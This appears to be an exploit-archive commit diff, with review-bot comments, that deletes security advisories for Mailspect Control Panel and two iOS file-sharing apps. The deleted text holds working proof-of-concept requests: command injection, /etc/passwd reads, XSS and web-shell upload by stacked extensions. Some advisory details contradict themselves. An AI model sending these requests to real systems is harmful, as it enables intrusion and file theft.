DB: 2016-07-11
This commit is contained in:
parent
c9a818eb76
commit
76bc268c80
27 changed files with 441 additions and 1556 deletions
@ -1,31 +0,0 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=500

There is a crash when the Samsung Gallery application load the attached GIF, colormap.gif.

D/skia (10905): GIF - Parse error
D/skia (10905): --- decoder->decode returned false
F/libc (10905): Fatal signal 11 (SIGSEGV), code 2, fault addr 0x89f725ac in tid 11276 (thread-pool-0)
I/DEBUG ( 2958): pid: 10905, tid: 11276, name: thread-pool-0 >>> com.sec.android.gallery3d <<<
I/DEBUG ( 2958): signal 11 (SIGSEGV), code 2 (SEGV_ACCERR), fault addr 0x89f725ac
I/DEBUG ( 2958): x0 0000000000000001 x1 0000000089f725ac x2 0000000000000000 x3 00000000fff9038c
I/DEBUG ( 2958): x4 0000007f9c300000 x5 000000000000001f x6 0000000000000001 x7 0000007f9c620048
I/DEBUG ( 2958): x8 0000000000000000 x9 0000000000000000 x10 0000000000000080 x11 0000000000003758
I/DEBUG ( 2958): x12 0000000000000020 x13 0000000000000020 x14 00000000000000a5 x15 000000000000001f
I/DEBUG ( 2958): x16 00000000ffffe4e3 x17 00000000000000a5 x18 0000007f9c300000 x19 0000007f9c61fc00
I/DEBUG ( 2958): x20 0000007f9c664080 x21 0000000089e76b2c x22 000000000000003b x23 0000000000000001
I/DEBUG ( 2958): x24 0000000000000020 x25 0000000000000020 x26 0000000000000020 x27 0000007f9c664080
I/DEBUG ( 2958): x28 00000000000001da x29 0000000032e89ae0 x30 0000007faad70e64
I/DEBUG ( 2958): sp 0000007f9cfff170 pc 0000007faad72dbc pstate 0000000080000000
I/DEBUG ( 2958):
I/DEBUG ( 2958): backtrace:
I/DEBUG ( 2958): #00 pc 000000000002ddbc /system/lib64/libSecMMCodec.so (ColorMap+200)
I/DEBUG ( 2958): #01 pc 000000000002be60 /system/lib64/libSecMMCodec.so (decodeGIF+340)
I/DEBUG ( 2958): #02 pc 000000000000c90c /system/lib64/libSecMMCodec.so (Java_com_sec_samsung_gallery_decoder_SecMMCodecInterface_nativeDecode+436)
I/DEBUG ( 2958): #03 pc 000000000042ec00 /system/priv-app/SecGallery2015/arm64/SecGallery2015.odex

To reproduce, download the file and open it in Gallery


Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39023.zip

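Review bot: the removal leaves the PoC archive orphaned; the deleted text is the only place in the repo that points at https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39023.zip and names `colormap.gif`, and the commit message `DB: 2016-07-11` does not say whether that bin-sploit is also being retired or the entry is being re-filed under another ID. Either drop the archive in the same change or add the replacement ID to the message. If it is re-filed, keep the backtrace: it shows the fault is a `SEGV_ACCERR` at `ColorMap+200` in `/system/lib64/libSecMMCodec.so`, i.e. in Samsung's own codec rather than in skia, which only logs the parse error before handing off.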
@ -1,4 +1,4 @@
source: http://www.securityfocus.com/bid/2889/exploit
source: http://www.securityfocus.com/bid/2889/info

DCShop is a GCI-based ecommerce system from DCScripts.


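Review bot: only the `source:` URL changes here (`/bid/2889/exploit` to `/bid/2889/info`), but the unchanged context line directly below still reads `GCI-based` where `CGI-based` is meant; since this same header is being touched in two files in this commit, fix the typo in the same pass rather than leave it for a later sweep.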
|
@ -1,4 +1,4 @@
source: http://www.securityfocus.com/bid/2889/exploit
source: http://www.securityfocus.com/bid/2889/info

DCShop is a GCI-based ecommerce system from DCScripts.


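Review bot: after this change the two DCShop files carry byte-identical `source:` and description lines, so nothing in the header tells a reader which of the BID 2889 issues each entry covers; a one-line note under the `source:` line naming the specific flaw in each file would make the pair distinguishable without opening the PoC.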
|
@ -1,147 +0,0 @@
Document Title:
============
Mailspect Control Panel version 4.0.5 Multiple Vulnerabilities

Release Date:
===========
June 21, 2014

Product & Service Introduction:
========================
Mailspect is the email security and archiving brand of RAE Internet Inc., Tarrytown, New York. The Mailspect product suite was launched
in 2005 as a Control Panel for Open Source antispam and antivirus scanning engines such as Clamd and Spamassassin.

Mailspect Defense offered easy-to-use configuration and update tools and an integrated Quaratine Solution and Mail Filter. Subsequently,
the Control Panel has expanded to include commercial scanning engines such as Cloudmark, ESET, F-FROT, Mailshell, and Sophos and built-in
content filers and reputation engines.

Abstract Advisory Information:
=======================
BGA Team discovered a remote code execution, two arbitrary file read and one cross site scripting vulnerability in Mailspect Control Panel
4.0.5 web application.

Vulnerability Disclosure Timeline:
=========================
May 4, 2014 : Contact with Vendor
May 16, 2014 : Vendor Response
June 21, 2014 : Public Disclosure

Discovery Status:
=============
Published

Affected Product(s):
===============
Multilayered Email Security & Archive for Gateways, MTA's & Servers
Product: Mailspect Control Panel 4.0.5
Other versions may be affected.

Exploitation Technique:
==================
RCE: Remote, Authenticated
AFR: Remote, Authenticated
XSS: Remote, Unauthenticated

Severity Level:
===========
High

Technical Details & Description:
========================
1. Sending a POST request to "/system_module.cgi" with config_version_cmd parameter's value set to a linux command group like "whoami >
/tmp/who; /usr/local/MPP/mppd -v" causes the former command's execution by sending a GET request (or simply visiting) to
"status_info.cgi?group=default" page.
Other parameters with the suffix "_cmd" are probably vulnerable.

2. Sending a GET request to "/monitor_logs_ctl.cgi" with log_dir parameter's value set to "/" and log_file's value set to an arbitrary
file name like "/etc/passwd" will cause the file's content's disclosure.

3. Sending a POST request to "/monitor_manage_logs.cgi" with log_file parameter's value set to an arbitrary file name like "/etc/passwd"
will cause the file's content's disclosure.

4. Sending a POST request to "/monitor_manage_logs.cgi" with login parameter's value set to "></script>js to be executed<script/> leads
the Javascript code's execution.

Proof of Concept (PoC):
==================
Proof of Concept RCE Request:

POST /system_module.cgi HTTP/1.1
Host: 192.168.41.142:20001
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140319 Firefox/24.0 Iceweasel/24.4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.41.142:20001/system_module.cgi?group=default
Cookie: u=53616c7465645f5f6810a04926ec4f8abd8a9e81627719b8f41e24440b249428;
p=53616c7465645f5fdc8dd8cb831abe607bdacefb54f02acddc8961afca6b6bdb; t=53616c7465645f5fd3b2cf075e637bc5b74031ed60d53d57a88522253901b706
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 1282

post=1&config_mppd_conf=%2Fusr%2Flocal%2FMPP%2Fmppd.conf.xml&config_language=&config_log_dir=%2Fvar%2Flog%2FMPP%2F&config_version_cmd=whoami+%3E+%2Ftmp%2Fwho%3B+%2Fusr%2Flocal%2FMPP%2Fmppd+-v&config_licence_cmd=%2Fusr%2Flocal%2FMPP%2Fmppd+-l+%2Fusr%2Flocal%2FMPP%2Fkey.txt&config_start_cmd=%2Fusr%2Flocal%2FMPP%2Fmppd&config_stop_cmd=%2Fusr%2Flocal%2FMPP%2Fmppd+-s&config_restart_cmd=%2Fusr%2Flocal%2FMPP%2Fmppd+-r&config_sophos_daily=%2Fusr%2Flocal%2Fmppserver%2Fapps%2Fmpp-gui%2Fscripts%2Fupdate_scripts%2Fsophosdaily.sh&config_sophos_monthly=%2Fusr%2Flocal%2FMPP%2Fscripts%2Fsophosmonthly.pl&config_fprot_update=%2Fusr%2Flocal%2Ff-prot%2Ftools%2Fcheck-updates.pl&config_cloudmark_update=%2Fusr%2Flocal%2Fmppserver%2Fapps%2Fmpp-gui%2Fscripts%2Fupdate_scripts%2Fcloudmarkupdate.sh&config_cgate_submitted=%2Fvar%2FCommuniGate%2FSubmitted&config_clamav_update=%2Fusr%2Flocal%2Fmppserver%2Fapps%2Fmpp-gui%2Fscripts%2Fupdate_scripts%2Fclamavupdate.sh&config_cloudmark_dir=%2Fusr%2Flocal%2FMPP%2Fcloudmark&config_mailshell_dir=%2Fusr%2Flocal%2FMPP%2Fmailshell&config_fprot_dir=&config_pid_file=%2Fvar%2Frun%2Fmppd.pid&config_mailshell_update=%2Fusr%2Flocal%2FMPP%2Fmailshellupdate&config_mpp_parser_log_dir=%2Fvar%2Flog%2FMPP%2F%2Fplog&config_mpp_parser_time_interval=20&page_refresh=60

2. Proof of Concept AFR Request 1:

GET /monitor_logs_ctl.cgi?log_file=/etc/passwd&log_dir=/&mode=tail&lines=50&filter=&dummy=0.4426060212816081 HTTP/1.1
Host: 192.168.41.142:20001
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140319 Firefox/24.0 Iceweasel/24.4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.41.142:20001/monitor_realtime_logs.cgi?group=default
Cookie: u=53616c7465645f5f6810a04926ec4f8abd8a9e81627719b8f41e24440b249428;
p=53616c7465645f5fdc8dd8cb831abe607bdacefb54f02acddc8961afca6b6bdb; t=53616c7465645f5fd3b2cf075e637bc5b74031ed60d53d57a88522253901b706
Connection: keep-alive

3. Proof of Concept AFR Request 2:

POST /monitor_manage_logs.cgi HTTP/1.1
Host: 192.168.41.142:20001
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140319 Firefox/24.0 Iceweasel/24.4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.41.142:20001/monitor_manage_logs.cgi?group=default
Cookie: u=53616c7465645f5f6810a04926ec4f8abd8a9e81627719b8f41e24440b249428;
p=53616c7465645f5fdc8dd8cb831abe607bdacefb54f02acddc8961afca6b6bdb; t=53616c7465645f5fd3b2cf075e637bc5b74031ed60d53d57a88522253901b706
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 85

group=default&post=1&log_file=/etc/passwd&download=Download&save_to_dir=&tar_gzip=on

4. Proof of Concept XSS Request:

GET /login.cgi?login=abc%22%3E%3Cscript%3Ealert(/bga/)%3C/script%3E HTTP/1.1
Host: 192.168.41.142:20001
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140319 Firefox/24.0 Iceweasel/24.4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive

Solution Fix & Patch:
================
XSS will be patched at version 4.0.7
There will be no patch for RCE and AFR vulnerabilities as stated at the vendor's reply.

Security Risk:
==========
The risk of the vulnerabilities above estimated as high.

Credits & Authors:
==============
Bilgi Guvenligi AKADEMISI - Onur ALANBEL, Ender AKBAÞ

Disclaimer & Information:
===================
The information provided in this advisory is provided as it is without any warranty. BGA disclaims all warranties, either expressed or
implied, including the warranties of merchantability and capability for a particular purpose. BGA or its suppliers are not liable in any
case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages.

Domain: www.bga.com.tr/advisories.html
Social: twitter.com/bgasecurity
Contact: bilgi@bga.com.tr

Copyright © 2014 | BGA Security
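Review bot: this deletes the whole Mailspect 4.0.5 advisory even though the deleted text records that the vendor will not patch the authenticated RCE (`config_version_cmd` on `/system_module.cgi`, fired by visiting `status_info.cgi?group=default`) or the two file reads (`log_file` on `/monitor_logs_ctl.cgi` and `/monitor_manage_logs.cgi`); if a duplicate entry survives elsewhere the commit message should name it, otherwise the only public reference for unfixed issues disappears with `DB: 2016-07-11` as the sole explanation. Note also that the deleted item 4 describes the XSS as a POST to `/monitor_manage_logs.cgi` with a `login` parameter while its PoC is `GET /login.cgi?login=...`; if the entry is re-filed, the description should be corrected to match the request actually shown.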
@ -1,311 +0,0 @@
Document Title:
===============
Phone Drive Eightythree 4.1.1 iOS - Multiple Vulnerabilities


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1168


Release Date:
=============
2013-12-11


Vulnerability Laboratory ID (VL-ID):
====================================
1168


Common Vulnerability Scoring System:
====================================
7.6


Product & Service Introduction:
===============================
Phone Drive allows you to store, view and manage files on your iPhone or iPad. You can connect to Phone Drive from any Mac or
PC over the Wi-Fi network and transfer files by drag & drop files straight from the Finder or Windows Explorer. Phone Drive
features document viewer, PDF reader, music player, image viewer, voice recorder, text editor, file manager and support most
of the file operations: like delete, move, copy, email, share, zip, unzip and more.

(Copy of the Homepage: https://itunes.apple.com/de/app/phone-drive/id431033044 )


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple web vulnerabilities in the official Eigthythree Phone Drive v4.1.1 iOS mobile application.


Vulnerability Disclosure Timeline:
==================================
2013-12-11: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Eightythree Technologies
Product: Phone Drive - Mobile Application 4.1.1


Exploitation Technique:
=======================
Remote


Severity Level:
===============
High


Technical Details & Description:
================================
1.1
A local command/path injection web vulnerability has been discovered in the Eigthythree Phone Drive v4.1.1 mobile application for apple iOS.
The remote web vulnerability allows to inject local commands via vulnerable system values to compromise the apple iOS mobile web-application.

The vulnerability is located in the in the device name value of the index and sub category list module. Local attackers are
able to inject own script codes as iOS device name. The execute of the injected script code occurs with persistent attack vector
in the header section of the web interface. The security risk of the command/path inject vulnerabilities are estimated as high
with a cvss (common vulnerability scoring system) count of 7.0(+)|(-)7.1.

Exploitation of the command/path inject vulnerability requires a local low privileged iOS device account with restricted access
and no direct user interaction. Successful exploitation of the vulnerability results in unauthorized execute of system specific
commands or unauthorized path requests.

Request Method(s):
[+] [GET]

Vulnerable Parameter(s):
[+] devicename

Affected Module(s):
[+] Index File Dir List - [Header]


1.2
A local file/path include web vulnerability has been discovered in the Eigthythree Phone Drive v4.1.1 mobile application for apple iOS.
The file include vulnerability allows remote attackers to include (upload) local file or path requests to compromise the web-application.

The remote file include web vulnerability is located in the vulnerable filename value of the file dir list index module (web interface).
Remote attackers can manipulate the filename value in the POST method request of the file upload form to cpmpromise the mobile application.
Remote attackers are able to include own local files by usage of the file upload module. The attack vector is persistent and the request
method is POST. The file include execute occcurs in the main file dir index list. The security risk of the local file include web
vulnerability is estimated as high(+) with a cvss (common vulnerability scoring system) count of 8.8(+).

Exploitation of the local file include web vulnerability requires no user interaction or privileged web-application user account with password.
Successful exploitation of the local web vulnerability results in application or device compromise by unauthorized local file include attacks.

Request Method(s):
[+] [POST]

Vulnerable Module(s):
[+] File Upload

Vulnerable Parameter(s):
[+] filename

Affected Module(s):
[+] Index File Dir Listing (http://localhost:80)



1.3
An arbitrary file upload web vulnerability has been discovered in the Eigthythree Phone Drive v4.1.1 mobile application for apple iOS.
The arbitrary file upload issue allows remote attackers to upload files with multiple extensions to bypass the web-server or system validation.

The vulnerability is located in the upload file module. Remote attackers are able to upload a php or js web-shells by a rename of the file with
multiple extensions to bypass the file restriction mechanism. The attacker uploads for example a web-shell with the following name and extension
`image.jpg.gif.js.php.jpg`. After the upload the attacker needs to open the file in the web application. He deletes the .jpg & . gif file
extension and can access the application with elevated access rights. The security risk of the arbitrary file upload web vulnerability is
estimated as high with a cvss (common vulnerability scoring system) count of 6.6(+).

Exploitation of the arbitrary file upload web vulnerability requires no user interaction or privilege application user account with password.
Successful exploitation of the vulnerability results in unauthorized file access because of a compromise after the upload of web-shells.


Request Method(s):
[+] [POST]

Vulnerable Module(s):
[+] File Upload

Vulnerable Parameter(s):
[+] filename (multiple extensions)

Affected Module(s):
[+] Index File Dir Listing (http://localhost:80)


1.4
A persistent input validation web vulnerability has been discovered in the Eigthythree Phone Drive v4.1.1 mobile application for apple iOS.
The (persistent) vulnerability allows remote attacker to inject own malicious script code on the application-side of the mobile application.

The persistent input validation vulnerability is located in the foldername (path) value of the folder/path create web-application module.
Remote attackers can inject own malicious script codes as payload to the create folder (path) input field. After the client-side inject
in the POSt method request the payload will be saved and the vector turns into a persistent attack. The persistent execute occurs in the
file dir index- or sub category folder list (http://localhost:8080). Attacker can also inject the script code by the rename of an
exsisting issue. The second execute occurs in the delete notification popup box of the item index list. The security risk of the persistent
input validation web vulnerability is estimated as medium(+) with a cvss (common vulnerability scoring system) count of 3.9(+).

Exploitation of the persistent input validation web vulnerability requires no privileged mobile application user account but low or medium
user interaction. Successful exploitation of the persistent vulnerability results in persistent session hijacking (customers) attacks, account
steal via persistent web attacks, persistent phishing or persistent manipulation of vulnerable module context.

Request Method(s):
[+] [POST]

Vulnerable Input(s):
[+] Create Folder

Vulnerable Parameter(s):
[+] foldername (path)

Affected Module(s):
[+] Index File Dir Listing (http://localhost:80)


Proof of Concept (PoC):
=======================
1.1
The local command inject web vulnerability can be exploited by local attackers with physical restricted device access and without user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below.

PoC: DeviceName - Index File Dir List

<tr>
<td><a href="http://localhost:80/"><img src="Phone%20Drive%20-%20devicename_files/webicon.png" id="headerImg" height="57" width="57"></a></td>
<td><h2>device bkm>"<<>"<../[LOCAL COMMAND/PATH INJECT WEB VULNERABILITY!]"></h2></td>
<td width="170" align="center"><a
href="http://www.eightythreetech.com" target="_blank"><img
src="/webroot/moreapps.png"/></a></td>
</tr>
</table>



1.2
The local file include web vulnerability can be exploited by remote attackers without privileged web-application user account and user interaction.
For security demonstration or to reproduce the web vulnerability follow the provided information and steps below.

PoC:
<tr class="c"><td class="e"><input name="selection" value="[LOCAL FILE INCLUDE VULNERABILITY!]" type="checkbox"></td>
<td class="i"><a href="Help.webarchive"><img src="/webroot/fileicons/webarchive.png" height="20"
width="20"></a></td><td class="n"><a href="[LOCAL FILE INCLUDE VULNERABILITY!]">[LOCAL FILE INCLUDE VULNERABILITY!]</a></td><td class="m">
17.09.2015 18:07</td><td class="s">24.7 KB</td><td class="k">Safari Web Archive</td><td class="e">
<a href="#" title="Download file" onclick="downloadFile("[LOCAL FILE INCLUDE VULNERABILITY!]");">
<img src="/webroot/webdownload.png" height="15" width="15"></a></td><td class="e"><a href="#"
title="Rename file" onclick="modalPopup("Help.webarchive", 0, 1);">
<img src="/webroot/webrename.png" height="15" width="15"></a></td><td class="e">
<a href="#" title="Delete file" onclick="modalPopup("Help.webarchive", 2, 1);">
<img src="/webroot/webdelete.png" height="15" width="15"></a></td></tr>



1.3
The arbitrary file upload and restricted upload bypass web vulnerability can be exploited by remote attackers without user interaction
or privileged web-application user account. For security demonstration or to reproduce the vulnerability follow the provided information
and steps below.


PoC Session Logs: qqfile

Status: 200 OK
POST http://localhost:80/qqfile=arbitrary-file-upload.png.txt.iso.js.html.php.jpg
Load Flags[LOAD_BYPASS_CACHE ]
Content Size[unknown] Mime Type[unknown]

Request Headers:
Host[192.168.2.106]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:25.0) Gecko/20100101 Firefox/25.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
X-Requested-With[XMLHttpRequest]
X-File-Name[arbitrary-file-upload.png.txt.iso.js.html.php.jpg]
Content-Type[application/octet-stream]
Referer[http://192.168.2.106/]
Content-Length[98139]
Post Data:
POST_DATA[‰PNG



1.4
The persistent input validation web vulnerability can be exploited by remote attackers without privileged web application user account
and low user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below.


PoC: Creat Folder - Index File Dir List & Sub Category List

<tr class="c"><td class="e"><input name="selection"
value="%3E%22%3Cx%20src=a%3E" type="checkbox"></td><td class="i">
<a href="http://localhost/%3E%22%3Ciframe%20src=a%3E/"><img src="Phone%20Drive%20-%20pathname_files/folder.png"
height="20" width="20"></a></td><td class="n"><a href="http://localhost/%3E%22%3Cx%3E/">
>"<[PERSISTENT INJECTED SCRIPT CODE!]"></a></td><td
class="m">11.12.2013 13:29</td><td


Solution - Fix & Patch:
=======================
1.1
The first vulnerability can be patched by a secure encode of the devicename value in the ehader section of the index module.

1.2 - 1.3
Restrict the filename input and parse the context with a filter mechanism. Disallow multiple file extensions and implement
a own exception-handling to prevent arbitrary file uploads or restricted file uploads.


Security Risk:
==============
1.1
The security risk of the local command inject web vulnerability is estimated as high(-).

1.2 - 1.3
The security risk of the local file include web vulnerability via file and folder name value is estimated as high(+).


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.

Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

Copyright <20> 2013 | Vulnerability Laboratory [Evolution Security]



--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com


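Review bot: if this advisory is being removed for quality, the commit message should say so, because the deleted text supplies the reasons on its own: the header CVSS is 7.6 while the body scores the four issues 7.0/7.1, 8.8, 6.6 and 3.9; issue 1.1 is called both `local` and `remote` and its PoC is a device-name string rendered into an `<h2>`, not a command injection; the interface is `http://localhost:80` in 1.2 and 1.3 but `http://localhost:8080` in 1.4; the release date is 2013-12-11 yet the 1.2 PoC listing carries a `17.09.2015` timestamp; and the `Solution` and `Security Risk` sections cover 1.1 to 1.3 only, leaving the 1.4 persistent injection with neither a fix nor a rating. A deletion explained only by `DB: 2016-07-11` gives a later reader none of this.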
@ -1,214 +0,0 @@
Document Title:
===============
File Manager v4.2.10 iOS - Code Execution Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1343


Release Date:
=============
2014-10-21


Vulnerability Laboratory ID (VL-ID):
====================================
1343


Common Vulnerability Scoring System:
====================================
9


Product & Service Introduction:
===============================
Try a file manager that’s unmatched in functionality and reliability. It was created to manage your cloud services like GoogleDrive, Dropbox,
Box, OneDrive, Yandex.Disk, and network services like FTP, SFTP, SMB, WebDAV, DLNA, photo galleries and files on your device. Manage all of
your stored data like sub-folders - copy, move, rename or compress to archive your folders and files. It supports all possible archive
formats: Zip, Rar, 7z, tar, gz, bz2. You can protect your folders and files with a password and view photo, video and audio content, as well
as documents. This application will be a great help for everyday tasks. Copy a folder from one cloud service to any other - easy! Quickly move
a folder from an archive to a cloud service - easy! Copy your gallery to a network or cloud service - easy!

(Copy of the Homepage: https://itunes.apple.com/de/app/file-manager-pro-manage-your/id926125881 )


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research team discovered a code execution vulnerability in the official DevelSoftware LTD - File Manager v4.2.10 iOS mobile application.


Vulnerability Disclosure Timeline:
==================================
2014-10-21: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
DevelSoftware LTD
Product: File Manager - iOS Mobile Web Application (Wifi) 4.2.10


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Critical


Technical Details & Description:
================================
A code execution vulnerability has been discovered in the official DevelSoftware LTD - File Manager v4.2.10 iOS mobile application.
The issue allows an attacker to compromise the application and connected device components by exploitation of a system specific code
execution vulnerability in the wifi interface.

The vulnerability is located in the `Create Folder` input field of the index.html wifi web interface. The function create the path value
without any protection or filter mechanism in the GET method request. Remote attackers are able to manipulate the GET method request by
usage of the `createdir?path=` parameter to compromise the application or device. The execution of the code occurs in the index.html file
next to the name output context of the wifi share file dir listing. The attack vector is located on the application-side of the mobile app
and the request method to inject is GET.

The security risk of the remote code execution web vulnerability is estimated as critical with a cvss (common vulnerability scoring system) count of 8.8
Exploitation of the remote code execution web vulnerability requires no privileged application user account (passwd default blank) or user interaction.
Successful exploitation of the code execution vulnerability results in mobile application compromise and connected or affected device component compromise.


Request Method(s):
[+] GET

Vulnerable Module(s):
[+] Create Folder

Vulnerable Parameter(s):
[+] createdir?path=(name)

Affected Module(s):
[+] Wifi Interface (index.html)


Proof of Concept (PoC):
=======================
The code execution vulnerability can be exploited by attackers in the same local wifi without user interaction or pass code authorization.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.

1. Install the mobile app to your local iOS device (iphone or ipad) [https://itunes.apple.com/de/app/file-manager-pro-manage-your/id926125881]
2. Start the app and push in the left corner the wifi transfer button
3. Take another device or computer that allows you to access the wifi file transfer interface (localhost:80)
4. Now, inject own code as payload by usage of the create folder input field
Note: The input field requests the path value directly via GET method request without secure parse or encode
5. The code execution occurs directly after the inject in the index.html file of the web interface
6. Successful reproduce of the security vulnerability!


PoC: index.html (Name) [createdir?path=]

<fieldset class="buttonsFieldset">
<input disabled="" value="Download Files" class="buttons" id="loadFileButton" onclick="loadFileButtonClick()" type="button">
<input value="Upload Files" class="buttons" id="uploadFilesButton" onclick="uploadFilesButtonClick()" type="button">
<input value="Create Folder" class="buttons" id="createFolderButton" onclick="createFolderButtonClick()" type="button">
<input disabled="" value="Rename" class="buttons" id="renameButton" onclick="renameButtonClick()" type="button">
<input disabled="" value="Delete" class="buttons" id="deleteButton" onclick="deleteButtonClick()" type="button">
<input value="Select All" class="buttons" id="selectAllButton" onclick="selectAllButtonClick()" type="button">
<input value="Deselect All" class="buttons" id="unselectAllButton" onclick="unselectAllButtonClick()" type="button">
</fieldset>
<div class="separator"></div>
<div class="fileListTableContainer">
<table class="table" id="fileListTable"><tbody><tr id="fileListTable_-1" class="header">
<td id="fileListTable_-1_0" class="field">Name</td><td id="fileListTable_-1_1" class="field">Ext</td><td id="fileListTable_-1_2" class="field">Size</td></tr>
<tr index="0" id="fileListTable_0" class="row"><td index="0" field="name" id="fileListTable_0_0" class="cell">>-[CODE EXECUTION VULNERABILITY!]></td>
|
||||
<td index="1" field="ext" id="fileListTable_0_1" class="cell">dir</td><td index="2" field="size" id="fileListTable_0_2" class="cell"></td></tr>
|
||||
<tr index="1" id="fileListTable_1" class="row"><td index="0" field="name" id="fileListTable_1_0" class="cell">testfolder1</td><td index="1" field="ext"
|
||||
id="fileListTable_1_1" class="cell">dir</td><td index="2" field="size" id="fileListTable_1_2" class="cell"></td></tr><tr index="2" id="fileListTable_2"
|
||||
class="row"><td index="0" field="name" id="fileListTable_2_0" class="cell">testfolder2</td><td index="1" field="ext" id="fileListTable_2_1"
|
||||
class="cell">dir</td><td index="2" field="size" id="fileListTable_2_2" class="cell"></td></tr></tbody></table></div>
|
||||
|
||||
|
||||
--- PoC Session Logs [GET] ---
|
||||
Status: 200[OK]
|
||||
GET http://localhost:80/createdir?path=%2F%3E%22%3C-[CODE EXECUTION VULNERABILITY!];%3E Load Flags[LOAD_BACKGROUND ] Größe des Inhalts[43] Mime Type[application/x-unknown-content-type]
|
||||
Request Header:
|
||||
Host[localhost:80]
|
||||
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
|
||||
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
|
||||
Accept-Language[de,en-US;q=0.7,en;q=0.3]
|
||||
Accept-Encoding[gzip, deflate]
|
||||
Referer[http://localhost:80/index.html]
|
||||
Connection[keep-alive]
|
||||
Response Header:
|
||||
Connection[Keep-Alive]
|
||||
Content-Length[43]
|
||||
|
||||
|
||||
Status: 200[OK]
|
||||
GET http://localhost:80/-[CODE EXECUTION VULNERABILITY]; Load Flags[LOAD_DOCUMENT_URI ] Größe des Inhalts[-1] Mime Type[application/x-unknown-content-type]
|
||||
Request Header:
|
||||
Host[localhost:80]
|
||||
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
|
||||
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
|
||||
Accept-Language[de,en-US;q=0.7,en;q=0.3]
|
||||
Accept-Encoding[gzip, deflate]
|
||||
Referer[http://localhost:80/index.html]
|
||||
Connection[keep-alive]
|
||||
Response Header:
|
||||
Connection[Close]
|
||||
Date[Sun, 19 Oct 2014 16:22:46 GMT]
|
||||
|
||||
|
||||
Solution - Fix & Patch:
|
||||
=======================
|
||||
The vulnerability can be patched by a secure restriction and parse of the create folder input field. Encode also the vulnerable name value in the
|
||||
index.html file to prevent application-side code execution attacks.
|
||||
|
||||
|
||||
Security Risk:
|
||||
==============
|
||||
The security risk of the code execution web vulnerability in the path value is estimated as critical. (CVSS 8.8)
|
||||
|
||||
|
||||
Credits & Authors:
|
||||
==================
|
||||
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
|
||||
|
||||
|
||||
Disclaimer & Information:
|
||||
=========================
|
||||
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either
|
||||
